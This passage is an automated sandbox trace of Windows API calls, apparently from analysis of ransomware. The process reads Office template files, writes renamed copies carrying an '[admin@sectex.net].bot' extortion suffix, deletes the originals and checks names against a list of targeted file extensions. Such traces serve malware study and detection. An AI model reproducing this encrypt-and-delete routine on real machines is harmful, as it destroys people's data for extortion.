	[0168.584] WriteFile (in: hFile=0x3d0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0168.584] SetEndOfFile (hFile=0x3d0) returned 1
	[0168.584] CloseHandle (hObject=0x3d0) returned 1
	[0168.584] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.584] SetEndOfFile (hFile=0x3e8) returned 1
	[0168.586] CloseHandle (hObject=0x3e8) returned 1
	[0168.586] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCS.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0168.586] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskaccs.ico")) returned 1
	[0168.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCS.ICO") returned 66
	[0168.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCS.ICO") returned 66
	[0168.587] lstrlenW (lpString=".doc") returned 4
	[0168.587] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0168.587] lstrlenW (lpString=".docx") returned 5
	[0168.587] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0168.587] lstrlenW (lpString=".pdf") returned 4
	[0168.587] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0168.587] lstrlenW (lpString=".xls") returned 4
	[0168.587] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0168.587] lstrlenW (lpString=".xlsx") returned 5
	[0168.587] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0168.587] lstrlenW (lpString=".ppt") returned 4
	[0168.587] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0168.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCS.ICO") returned 66
	[0168.587] lstrlenW (lpString=".zip") returned 4
	[0168.587] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0168.587] lstrlenW (lpString=".rar") returned 4
	[0168.587] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0168.587] lstrlenW (lpString=".bz2") returned 4
	[0168.587] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0168.587] lstrlenW (lpString=".7z") returned 3
	[0168.587] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0168.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCS.ICO") returned 66
	[0168.587] lstrlenW (lpString=".dbf") returned 4
	[0168.587] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0168.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCS.ICO") returned 66
	[0168.587] lstrlenW (lpString=".1cd") returned 4
	[0168.588] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0168.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCS.ICO") returned 66
	[0168.588] lstrlenW (lpString=".jpg") returned 4
	[0168.588] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0168.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCS.ICO") returned 66
	[0168.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCS.ICO") returned 66
	[0168.588] lstrlenW (lpString=".doc") returned 4
	[0168.588] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0168.588] lstrlenW (lpString=".docx") returned 5
	[0168.588] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0168.588] lstrlenW (lpString=".pdf") returned 4
	[0168.588] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0168.588] lstrlenW (lpString=".xls") returned 4
	[0168.588] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0168.588] lstrlenW (lpString=".xlsx") returned 5
	[0168.588] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0168.588] lstrlenW (lpString=".ppt") returned 4
	[0168.588] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0168.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCS.ICO") returned 66
	[0168.588] lstrlenW (lpString=".zip") returned 4
	[0168.588] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0168.588] lstrlenW (lpString=".rar") returned 4
	[0168.588] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0168.588] lstrlenW (lpString=".bz2") returned 4
	[0168.588] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0168.588] lstrlenW (lpString=".7z") returned 3
	[0168.588] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0168.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCS.ICO") returned 66
	[0168.588] lstrlenW (lpString=".dbf") returned 4
	[0168.588] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0168.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCS.ICO") returned 66
	[0168.588] lstrlenW (lpString=".1cd") returned 4
	[0168.588] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0168.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKACCS.ICO") returned 66
	[0168.589] lstrlenW (lpString=".jpg") returned 4
	[0168.589] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0168.589] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0168.589] lstrlenW (lpString="TASKDEC.CFG") returned 11
	[0168.589] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDEC.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskdec.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0168.624] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=807) returned 1
	[0168.624] CloseHandle (hObject=0x1b4) returned 1
	[0168.624] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDEC.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskdec.cfg")) returned 0x20
	[0168.656] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDEC.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskdec.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0168.657] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDEC.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskdec.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0168.657] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.657] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.657] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDEC.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskdec.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0168.658] GetLastError () returned 0x0
	[0168.658] ReadFile (in: hFile=0x3ac, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x327, lpOverlapped=0x0) returned 1
	[0168.681] WriteFile (in: hFile=0x268, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x330, lpOverlapped=0x0) returned 1
	[0168.681] ReadFile (in: hFile=0x3ac, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0168.681] WriteFile (in: hFile=0x268, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0168.682] SetEndOfFile (hFile=0x268) returned 1
	[0168.682] CloseHandle (hObject=0x268) returned 1
	[0168.682] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.682] SetEndOfFile (hFile=0x3ac) returned 1
	[0168.684] CloseHandle (hObject=0x3ac) returned 1
	[0168.684] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDEC.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0168.684] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDEC.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskdec.cfg")) returned 1
	[0168.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDEC.CFG") returned 65
	[0168.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDEC.CFG") returned 65
	[0168.685] lstrlenW (lpString=".doc") returned 4
	[0168.685] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0168.685] lstrlenW (lpString=".docx") returned 5
	[0168.685] lstrcmpiW (lpString1=".docx", lpString2="C.CFG") returned -1
	[0168.685] lstrlenW (lpString=".pdf") returned 4
	[0168.685] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0168.685] lstrlenW (lpString=".xls") returned 4
	[0168.685] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0168.685] lstrlenW (lpString=".xlsx") returned 5
	[0168.685] lstrcmpiW (lpString1=".xlsx", lpString2="C.CFG") returned -1
	[0168.685] lstrlenW (lpString=".ppt") returned 4
	[0168.685] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0168.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDEC.CFG") returned 65
	[0168.685] lstrlenW (lpString=".zip") returned 4
	[0168.685] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0168.685] lstrlenW (lpString=".rar") returned 4
	[0168.685] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0168.685] lstrlenW (lpString=".bz2") returned 4
	[0168.685] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0168.685] lstrlenW (lpString=".7z") returned 3
	[0168.686] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0168.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDEC.CFG") returned 65
	[0168.686] lstrlenW (lpString=".dbf") returned 4
	[0168.686] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0168.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDEC.CFG") returned 65
	[0168.686] lstrlenW (lpString=".1cd") returned 4
	[0168.686] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0168.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDEC.CFG") returned 65
	[0168.686] lstrlenW (lpString=".jpg") returned 4
	[0168.686] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0168.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDEC.CFG") returned 65
	[0168.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDEC.CFG") returned 65
	[0168.686] lstrlenW (lpString=".doc") returned 4
	[0168.686] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0168.686] lstrlenW (lpString=".docx") returned 5
	[0168.686] lstrcmpiW (lpString1=".docx", lpString2="C.CFG") returned -1
	[0168.686] lstrlenW (lpString=".pdf") returned 4
	[0168.686] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0168.686] lstrlenW (lpString=".xls") returned 4
	[0168.686] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0168.686] lstrlenW (lpString=".xlsx") returned 5
	[0168.686] lstrcmpiW (lpString1=".xlsx", lpString2="C.CFG") returned -1
	[0168.686] lstrlenW (lpString=".ppt") returned 4
	[0168.686] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0168.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDEC.CFG") returned 65
	[0168.686] lstrlenW (lpString=".zip") returned 4
	[0168.686] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0168.686] lstrlenW (lpString=".rar") returned 4
	[0168.686] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0168.686] lstrlenW (lpString=".bz2") returned 4
	[0168.686] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0168.686] lstrlenW (lpString=".7z") returned 3
	[0168.686] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0168.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDEC.CFG") returned 65
	[0168.686] lstrlenW (lpString=".dbf") returned 4
	[0168.687] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0168.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDEC.CFG") returned 65
	[0168.687] lstrlenW (lpString=".1cd") returned 4
	[0168.687] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0168.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKDEC.CFG") returned 65
	[0168.687] lstrlenW (lpString=".jpg") returned 4
	[0168.687] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0168.687] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0168.687] lstrlenW (lpString="TASKREQL.ICO") returned 12
	[0168.687] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskreql.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0168.703] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=1078) returned 1
	[0168.703] CloseHandle (hObject=0x3a8) returned 1
	[0168.703] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskreql.ico")) returned 0x20
	[0168.705] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskreql.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0168.705] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskreql.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0168.705] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.705] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.706] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskreql.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0168.706] GetLastError () returned 0x0
	[0168.706] ReadFile (in: hFile=0x3a8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x436, lpOverlapped=0x0) returned 1
	[0168.707] WriteFile (in: hFile=0x388, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x440, lpOverlapped=0x0) returned 1
	[0168.708] ReadFile (in: hFile=0x3a8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0168.708] WriteFile (in: hFile=0x388, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0168.708] SetEndOfFile (hFile=0x388) returned 1
	[0168.709] CloseHandle (hObject=0x388) returned 1
	[0168.709] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.709] SetEndOfFile (hFile=0x3a8) returned 1
	[0168.711] CloseHandle (hObject=0x3a8) returned 1
	[0168.711] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQL.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0168.711] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskreql.ico")) returned 1
	[0168.714] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQL.ICO") returned 66
	[0168.714] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQL.ICO") returned 66
	[0168.714] lstrlenW (lpString=".doc") returned 4
	[0168.714] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0168.714] lstrlenW (lpString=".docx") returned 5
	[0168.714] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0168.714] lstrlenW (lpString=".pdf") returned 4
	[0168.714] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0168.714] lstrlenW (lpString=".xls") returned 4
	[0168.714] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0168.714] lstrlenW (lpString=".xlsx") returned 5
	[0168.714] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0168.714] lstrlenW (lpString=".ppt") returned 4
	[0168.714] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0168.714] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQL.ICO") returned 66
	[0168.714] lstrlenW (lpString=".zip") returned 4
	[0168.714] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0168.714] lstrlenW (lpString=".rar") returned 4
	[0168.714] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0168.715] lstrlenW (lpString=".bz2") returned 4
	[0168.715] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0168.715] lstrlenW (lpString=".7z") returned 3
	[0168.715] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0168.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQL.ICO") returned 66
	[0168.715] lstrlenW (lpString=".dbf") returned 4
	[0168.715] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0168.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQL.ICO") returned 66
	[0168.715] lstrlenW (lpString=".1cd") returned 4
	[0168.715] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0168.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQL.ICO") returned 66
	[0168.715] lstrlenW (lpString=".jpg") returned 4
	[0168.715] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0168.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQL.ICO") returned 66
	[0168.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQL.ICO") returned 66
	[0168.715] lstrlenW (lpString=".doc") returned 4
	[0168.715] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0168.715] lstrlenW (lpString=".docx") returned 5
	[0168.715] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0168.715] lstrlenW (lpString=".pdf") returned 4
	[0168.715] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0168.715] lstrlenW (lpString=".xls") returned 4
	[0168.715] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0168.715] lstrlenW (lpString=".xlsx") returned 5
	[0168.715] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0168.715] lstrlenW (lpString=".ppt") returned 4
	[0168.715] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0168.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQL.ICO") returned 66
	[0168.715] lstrlenW (lpString=".zip") returned 4
	[0168.715] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0168.715] lstrlenW (lpString=".rar") returned 4
	[0168.715] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0168.715] lstrlenW (lpString=".bz2") returned 4
	[0168.715] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0168.716] lstrlenW (lpString=".7z") returned 3
	[0168.716] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0168.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQL.ICO") returned 66
	[0168.716] lstrlenW (lpString=".dbf") returned 4
	[0168.716] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0168.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQL.ICO") returned 66
	[0168.716] lstrlenW (lpString=".1cd") returned 4
	[0168.716] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0168.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQL.ICO") returned 66
	[0168.716] lstrlenW (lpString=".jpg") returned 4
	[0168.716] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0168.716] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0168.716] lstrlenW (lpString="TASKREQS.ICO") returned 12
	[0168.716] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskreqs.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0168.717] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=2998) returned 1
	[0168.717] CloseHandle (hObject=0x3b8) returned 1
	[0168.717] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskreqs.ico")) returned 0x20
	[0168.717] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskreqs.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0168.717] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskreqs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0168.717] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.717] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.717] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\TASKREQS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\taskreqs.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0168.718] GetLastError () returned 0x0
	[0168.718] ReadFile (in: hFile=0x3b8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0xbb6, lpOverlapped=0x0) returned 1
	[0168.984] WriteFile (in: hFile=0x398, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xbc0, lpOverlapped=0x0) returned 1
	[0168.985] ReadFile (in: hFile=0x3b8, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
